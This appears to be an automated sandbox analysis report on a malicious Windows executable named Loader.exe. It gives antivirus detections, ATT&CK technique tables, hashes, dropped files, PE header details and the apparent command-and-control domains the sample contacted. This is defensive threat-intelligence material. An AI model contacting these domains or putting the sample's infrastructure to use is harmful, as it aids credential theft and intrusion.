              Windows Management Instrumentation              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory131
              Security Software Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
              Virtualization/Sandbox Evasion              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares31
              Data from Local System              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection              		NTDS131
              Virtualization/Sandbox Evasion              		Distributed Component Object Model2
              Clipboard Data              		Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets11
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information              		Cached Domain Credentials33
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Loader.exe42%ReversingLabsWin32.Dropper.Jalapeno
              Loader.exe100%AviraHEUR/AGEN.1310947
              Loader.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              mafnufacut.cyou
              		104.21.41.158
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                servicedny.sitetrue
                  		unknown
                  https://mafnufacut.cyou/apitrue
                    		unknown
                    goalyfeastz.sitetrue
                      		unknown
                      contemteny.sitetrue
                        		unknown
                        opposezmny.sitetrue
                          		unknown
                          authorisev.sitetrue
                            		unknown
                            faulteyotk.sitetrue
                              		unknown
                              seallysl.sitetrue
                                		unknown
                                mafnufacut.cyoutrue
                                  		unknown
                                  dilemmadu.sitetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://mafnufacut.cyou/graaspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://mafnufacut.cyou/haspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://mafnufacut.cyou:443/apiaspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://mafnufacut.cyou/piaspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://mafnufacut.cyou/paspnet_regiis.exe, 00000003.00000003.2168503506.0000000005AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://mafnufacut.cyou/nkkpib0aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://mafnufacut.cyou/raspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://mafnufacut.cyou/Theaspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://mafnufacut.cyou/Aaspnet_regiis.exe, 00000003.00000003.2154322168.000000000368B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://mafnufacut.cyou/2Uaspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://mafnufacut.cyou/apiuaspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://mafnufacut.cyou/aspnet_regiis.exe, 00000003.00000003.2224998411.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168775207.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168731170.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2214118301.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213943534.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168486617.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198964863.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2196049342.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168815356.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213899457.0000000005AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://mafnufacut.cyou/t7c5aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.mozilla.oraspnet_regiis.exe, 00000003.00000003.2182980628.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://mafnufacut.cyou/piEaspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://mafnufacut.cyou/apiZaspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.41.158
                                                                        		mafnufacut.cyouUnited States
                                                                        		13335CLOUDFLARENETUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1546098
                                                                        Start date and time:2024-10-31 14:06:04 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 48s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:5
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Loader.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 41
                                                                        • Number of non-executed functions: 128
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.16.100.168, 88.221.110.91
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Loader.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        09:06:57API Interceptor7x Sleep call for process: aspnet_regiis.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.41.1584akinoAb5k.pdfGet hashmaliciousUnknownBrowse

                                                                          Domains

                                                                          No context

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSPO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 188.114.96.3
                                                                          Uschamber-TimeSheet Reports.pdfGet hashmaliciousUnknownBrowse
                                                                          • 104.17.25.14
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 172.64.41.3
                                                                          https://www.chambersschool.org/programs/early-childhoodGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.33.140
                                                                          https://pub.lucidpress.com/50f1c535-8058-4eec-b469-2bd69fae4557/Get hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 188.114.96.3

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 104.21.41.158
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.41.158
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 104.21.41.158
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.41.158
                                                                          Orden de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 104.21.41.158
                                                                          Orden de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 104.21.41.158
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.41.158
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                          • 104.21.41.158
                                                                          Swift payment confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 104.21.41.158
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.41.158

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Loader.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:true
                                                                          Reputation:high, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                          C:\Users\user\AppData\Roaming\gdi32.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Loader.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):445440
                                                                          Entropy (8bit):6.981749103855763
                                                                          Encrypted:false
                                                                          SSDEEP:6144:rsXFmmtv+sbHkeZ8oDiu8TdaZh6LgzUXajjiMgrX5sQvOo5aqOpC30nQGr5gykQ5:rs1mmhrbHzDiH0Zy5Oo5j0hgykQGQbN
                                                                          MD5:330F34F58CCF18D73FD3762D200A21F9
                                                                          SHA1:3C5B99BCBD2D8E1A02040A8B25AEBDBD274F422C
                                                                          SHA-256:9110EAAF2945DEB7A1AF94855F90FF10A342AE5EF8D70758D5924FA2371D92FD
                                                                          SHA-512:6DF28801CDF4A6F59481E3AC93D50637308BE7206958B2CB395CC74FA851BCD2E25FE5F9E926DB2B537F0EEF9CC32EB2A96C3E821A0C51EE57E1B8EE4AAA90CB
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>3.._]]._]]._]].'^\._]].'X\._]].'Y\._]].'\\._]]..&]._]]._\]._]]..X\._]]..Y\._]]..^\._]]._]]._]]..]\._]].._\._]]Rich._]]........................PE..L...g##g...........!...&.,...................@............................................@.............................|...|...P...................................................................P...@............@..X............................text...S*.......,.................. ..`.rdata..fb...@...d...0..............@..@.data...l/.......&..................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.840296208768141
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:Loader.exe
                                                                          File size:304'640 bytes
                                                                          MD5:cf19765d8a9a2c2fd11a7a8c4ba3deda
                                                                          SHA1:63b5142b07b7773d4201932e7834ac11eafa1ab3
                                                                          SHA256:60b98a0907f9721cf28ccd684b565f7f77a90565e9a2bd47f75c419472c25a1c
                                                                          SHA512:b97fc305bd0d22e26abf99e302b166cd5d2bb959eddecad0f45dc978761178f5f6d47788c4ad5098313e587198abc66a3477ed42203345c20dc07db4783bb762
                                                                          SSDEEP:6144:thP45uoAaSWyz8jVnA183ipgz7YGGmEOM8xm53Jhuy3/uL:t25uDiyzmR7kYVxm5i+2L
                                                                          TLSH:7554CF9C765072DFC86BC9729EA81CA4E660B87B531FD243A01326ADD94D9CBCF141F2
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g##g............................N.... ........@.. ....................................@................................

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x44b84e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows cui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x67232367 [Thu Oct 31 06:27:51 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4b7fc0x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x708.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x498540x49a0011478d500b71c5f4ff306452b8ddcea1False0.9063030560271647data7.856893494807448IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x4c0000x7080x800a6498f21231860e62bfc99dad3369ddfFalse0.39111328125data3.7677582007788284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
